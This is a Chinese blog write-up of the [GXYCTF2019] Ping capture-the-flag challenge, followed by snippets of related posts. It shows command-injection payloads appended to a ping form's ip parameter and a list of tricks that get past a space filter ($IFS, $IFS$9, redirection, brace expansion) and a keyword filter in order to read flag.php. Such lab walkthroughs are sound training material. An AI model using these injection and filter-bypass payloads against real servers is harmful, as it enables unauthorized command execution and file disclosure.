CTF演练---ping

于 2024-06-06 16:58:38 发布
阅读量474 收藏 5
点赞数 11
分类专栏: CTF 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78637299/article/details/139503541
版权

一.[GXYCTF2019]Ping

1.根据提示输入ip

/?ip=0.0.0.0

/?ip=127.0.0.1 回显成功;

 

 显示当前所有的文件

/?ip=127.0.0.1|ls

这里可以发现想知道的目标文件flag.php;

尝试查看文件/?ip=127.0.0.1|cat flag.php

发现空格被限制;

  • 命令中空格被过滤的解决方法:
  • {cat,flag.php}
  • cat${IFS}flag.php
  • cat$IFS$9flag.php: $IFS$9 $9指传过来的第9个参数
  • cat<flag.php
  • cat<>flag.php
  • kg=$'\x20flag.php'&&cat$kg
  • (%20转换成字符串就是空格,这里通过变量的方式巧妙绕过)

 这里可以一一尝试,以下分别为错误和成功的反馈信息;

这里可以发现flag也被过滤了,尝试一下另一个文件; 

 打开index.php;

可以明显发现flag被限制,现在需要做的就是绕过限制;

代码审计可以发现$a可以进行输入,所有这里可以使用$a绕过限制;

构造payload:/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php

成功绕过;

 

但是并没有发现目标文件flag,查看源码;

得到flag; 

左小生
关注
  • 11
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF学习(5): 命令执行Ping
初尘屿风的博客
10-16 312
-
ctf-all-in-one
最新发布
01-30
ctf-all-in-one
BUUCTF--web--[GXYCTF2019]Ping Ping Ping--过滤操作
llx101388627的博客
05-02 361
点开链接,可以看到网页上仅有一行字: 不过可以从形式上看出,是告诉我们有一个变量ip 所以进行赋值尝试: 可以猜到程序极有可能是把我们上传的值作为一个ip地址,进行ping 命令 尝试在赋值语句后添加新的语句来查看目录: 发现可以,同时知道了有两个文件:index.php和flag.php 容易猜到flag 应该在flag.php中,那么尝试用cat命令查看: 看来程序中有过滤操作,这里应该是提示把空格过滤了,但过滤肯定不止空格 所以先想办法看一下index.php的源码 空格过滤处理 1、${I
CTF_Web_[GXYCTF2019]Ping Ping Ping
十二_的博客
07-26 1772
表示上一条命令执行失败后,才执行下一条命令,如catnofile||echo“fail”表示前一条命令执行成功时,才执行后一条命令,如echo'1‘&&echo‘2’表示管道,上一条命令的输出,作为下一条命令参数,如echo‘yes’|wc-l。发现没有任何新的回显,应该是因为前面是假ping,所以后面的命令不执行。如上图,“||”会有效果—显示了两个后缀为“php”的文件名.文件,或许我们要找的flag就在其中。根据大佬解题的思路,我们来找文件,进行测试。...
BUUCTF_Web_[GXYCTF2019]Ping Ping Ping
阿刁〇的博客
08-01 269
BUUCTF_Web_[GXYCTF2019]Ping Ping Ping 首先打开靶机 根据提示构造参数:http://8c638bd1-504a-40d4-81db-4ac92a9464f3.node4.buuoj.cn/?ip=127.0.0.1 尝试拼接命令读取flag:http://8c638bd1-504a-40d4-81db-4ac92a9464f3.node4.buuoj.cn/?ip=127.0.0.1;cat%20/flag 发现被过滤了,进行其他尝试 http://8c638b
ctf题集【BUUCTF WEB】[GXYCTF2019]Ping Ping Ping 1
qq_42667028的博客
12-19 491
说明空格被限制了,多次尝试发现$IFS$1可以绕过,尝试输入/?发现flag.php在当前目录下,那么就需要查看这个文件,尝试输入/?看来*也被限制了,那么尝试'''、''、\、$1、都无法绕过,换个思路,用base64绕过。flag也被限制了,那么尝试/?cat$IFS$1fla*尝试能否用管道符执行,输入参数/?ip=127.0.0.1后成功执行。
经典ctf ping题目详解 青少年CTF-WEB-PingMe02
m0_73734159的博客
11-18 1518
如果想效率更更高,我们还可以自己生成Linux常见列出目录文件和查看文件等命令和常用字符以及关键字的字典,并使用BurpSuite进行爆破查看那个命令和字符以及关键字的过滤情况。'作为命令之间的连接符,当上一个命令完成后,继续执行下一个命令。当然Linux系统查看文件内容的命令还有很多,这里就举着三个例子了。因为f开头的文件只有flag这一个文件,所以查的就是flag。cat是Linux系统里面最常见的查看文件内容的命令。ls是Linux系统里面的列出目录文件的命令。查看根目录下flag文件的内容。
My-CTF-Challenges
05-16
【标题】"我的CTF挑战"是一个集合,包含了一系列网络安全竞赛中的挑战,旨在提升参赛者在信息安全领域的技能和知识。这个挑战集可能是为一个名为"周大福"的活动或组织设计的。其中的一个具体挑战是"TCTF2018_决赛",...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-ping命令执行
qq_45414878的博客
11-08 9611
[GXYCTF2019]Ping Ping Ping 现在做一下关于常见的绕过ping执行其他命令的姿势,启动环境,连接并输入参数,查看当前目录下都有什么 ls命令没有被过滤,并且知道flag就在这个目录下面,用cat查看的flag的时候发现空格被禁用,绕过空格常用的方法有 {cat,flag.php} cat${IFS}flag.php cat$IFS$9flag.php cat<flag.php cat<>flag.php kg=$'\x20flag.php'&&c
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 1万+
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
CTF题目pingpingpongpong--获取flag
weixin_52937457的博客
03-17 1680
ctf获取flag入门
CTF关于ping命令注入问题(1)
热门推荐
欢迎来到神林的博客
03-07 1万+
题目样式 对于看到ping或者ping命令却没有弄waf时就要想到命令注入。 具体注入方法 看到ping命令就可以利用截断来执行新的命令。 首先测试所有的截断符号: ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&amp;&amp;’ ‘&amp;’ ‘}’ ‘{’ '%0a’可以当作空格来用; 利用截断符号配合普通命令简单问题基本就出来; 例如:ip=127.0.0.1...
CTF之命令执行常见绕过
qq_42383069的博客
04-18 5262
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
[GXYCTF2019]Ping Ping Ping
fightte的博客
05-17 127
界面就长这样,提示在url栏,进行/?ip=输入试试。 输入127.0.0.1 并没有特殊的返回。 是命令注入的题型: 先尝试输入|cat xx,利用cat指令连接文件并打印出来: cat一个任意值,貌似被过滤了。 尝试输入|ls,进行查看其php文件内容: 显示有这样两个文件,但是直接连接什么也没有显示,尝试通过cat连接,即cat flag.php, 还是什么也没有,或者直接返回了上一个界面。 推测有过滤: 语句提示空格被过滤了。尝试将空格转化为其他的东西,建议换为${IFS},这是shell语言.
[GXYCTF2019]Ping Ping Ping 解题思路(保姆级)
qq_61861243的博客
09-23 334
7、通过查看index.php文件既然只过滤空格、flag,我们就通过$IFS$1绕过空格过滤,使用变量合成flag绕过flag过滤,成功拿到flag(使用cat查看需要查看源代码得到flag、tac查看直接得到flag)1、既然过滤空格、flag我们就通过base64将cat flag.php进行base64加密再通过base64 -d解密执行操作得到flag(cat、tac查看方法同理、base64加解密网站。3、然后我查看了一下他的目录,发现了一个flag.php和一个index.php文件。
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py http://challenge-e87e0210287ba7b3.sandbox.ctfhub.com:10800/.git/"来使用GitHack工具进行扫描和利用。同时,你也可以使用dirsearch工具来扫描目录,执行命令"python dirsearch.py -u http://challenge-5a5d24023f7ea71c.sandbox.ctfhub.com:10800 -e git -t 5"来查找ctfhub-git泄露的stash。 然而,需要注意的是,这些工具只是为了帮助你快速发现ctfhub-git的泄露,真正的挖掘过程并不会像这样直接告诉你哪里有泄露,需要自己去尝试和探索。此外,Git这一工具的使用也相当复杂,需要深入学习和实践才能熟练掌握。所以,在学习的道路上还有很长的路要走,希望你能坚持学习,共同进步!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值